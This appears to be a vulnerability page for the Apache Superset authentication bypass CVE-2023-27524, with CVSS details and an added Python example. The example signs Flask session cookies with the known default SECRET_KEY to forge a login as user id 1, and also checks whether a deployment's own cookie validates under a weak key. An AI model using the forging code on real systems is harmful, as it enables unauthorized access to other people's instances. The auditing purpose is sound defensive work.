Apache Superset Auth Bypass Vulnerability CVE-2023-27524.

antx-code/CVE-2023-27524

CVE-2023-27524


Description

  • POC for CVE-2023-27524, the Apache Superset auth bypass vulnerability.
  • Created by antx on 2023-04-27.

Detail

  • Apache Superset versions up to and including 2.0.1 are vulnerable to a session-validation attack. Superset is a Flask application, and SECRET_KEY is the key that signs the Flask session cookie. Installations that have not changed the default SECRET_KEY, as the installation instructions require, allow an attacker who knows that default value to forge a valid session cookie, authenticate as any user, and access unauthorized resources. Installations whose administrators have changed the default SECRET_KEY are not affected.
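
The following is an added example, not code from this repository or from the Superset project. It re-implements, with the Python standard library only, the signing scheme Flask uses for its session cookie (the itsdangerous URLSafeTimedSerializer with salt "cookie-session", an HMAC-SHA1 derived key and HMAC-SHA1 signatures), so you can see why knowing SECRET_KEY is enough to mint a session, and it includes a check to run against a cookie from your own deployment. Assumptions: the default key value is the one from superset/config.py in affected releases (verify against your own checkout), the extra entries in WEAK_KEYS are placeholder strings from Superset docs and docker templates, and the session field `_user_id` is the one Flask-Login (used by Flask-AppBuilder) reads; the demo session contents are constructed.

```python
# Added example (not antx's PoC and not Superset code): Flask session cookie
# signing with SECRET_KEY, forging a session under a known default key, and a
# check that tells you whether a live cookie validates under a weak key.
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"  # Flask's fixed salt for the session serializer

# Python-evaluated form of the literal "\2\1thisismyscretkey\1\2\e\y\y\h" from
# superset/config.py in affected releases (assumption: compare with your checkout).
SUPERSET_DEFAULT_KEY = "\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h"

# Constructed candidate list: the default above plus placeholder strings that
# appear in Superset docs/docker templates (assumption; extend with your own history).
WEAK_KEYS = [
    SUPERSET_DEFAULT_KEY,
    "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",
    "thisISaSECRET_1234",
    "YOUR_OWN_RANDOM_GENERATED_SECRET_KEY",
]


def _b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret_key: str) -> bytes:
    # itsdangerous key_derivation="hmac": signing key = HMAC-SHA1(secret, salt)
    return hmac.new(secret_key.encode("utf-8"), SALT, hashlib.sha1).digest()


def _signature(secret_key: str, signed_value: bytes) -> bytes:
    return _b64e(hmac.new(_derive_key(secret_key), signed_value, hashlib.sha1).digest())


def sign_session(session: dict, secret_key: str, timestamp: Optional[int] = None) -> str:
    """Build a Flask-style session cookie for `session` signed with `secret_key`."""
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    # itsdangerous only compresses when it actually saves space, marking it with a leading "."
    body = b"." + _b64e(compressed) if len(compressed) < len(payload) - 1 else _b64e(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    signed_value = body + b"." + _b64e(ts_bytes)
    return (signed_value + b"." + _signature(secret_key, signed_value)).decode()


def verify_session(cookie: str, secret_key: str) -> Optional[dict]:
    """Return the session dict if `cookie` verifies under `secret_key`, else None.
    (Flask additionally enforces max_age; freshness is skipped here on purpose.)"""
    raw = cookie.encode()
    signed_value, sep, sig = raw.rpartition(b".")
    if not sep or not hmac.compare_digest(sig, _signature(secret_key, signed_value)):
        return None
    body, _, _ts = signed_value.rpartition(b".")
    payload = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
    return json.loads(payload)


def find_weak_key(cookie: str, candidates=WEAK_KEYS) -> Optional[str]:
    """Defensive check: feed it the `session` cookie your own Superset issued.
    A non-None result is the weak key that validates it, i.e. anyone who knows
    that key can forge sessions for your instance."""
    for key in candidates:
        if verify_session(cookie, key) is not None:
            return key
    return None


if __name__ == "__main__":
    # Constructed demo: an install left on the default key; an attacker mints a
    # session for user id 1 without ever logging in.
    forged = sign_session({"_user_id": "1", "_fresh": False}, SUPERSET_DEFAULT_KEY)
    print("forged cookie:", forged)
    print("server on default key accepts it as:", verify_session(forged, SUPERSET_DEFAULT_KEY))
    print("weak key detected:", find_weak_key(forged) is not None)
    # The same cookie is rejected by an install that rotated to a unique key.
    print("server on unique key:", verify_session(forged, "rotated-unique-key-0123456789"))
```

To audit an instance, log in normally, copy the `session` cookie from the browser and pass it to `find_weak_key`; any hit means SECRET_KEY must be replaced with a long random value, which also invalidates every existing session and, in Superset, requires re-encrypting the secrets the application stores under the old key (see the project's configuration docs for the procedure).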

CVE Severity

  • attackComplexity: HIGH
  • attackVector: NETWORK
  • availabilityImpact: LOW
  • confidentialityImpact: HIGH
  • integrityImpact: HIGH
  • privilegesRequired: NONE
  • scope: CHANGED
  • userInteraction: NONE
  • version: 3.1
  • baseScore: 8.9
  • baseSeverity: HIGH

Affected versions

  • Apache Superset
    • <= 2.0.1

POC


Patch


Reference
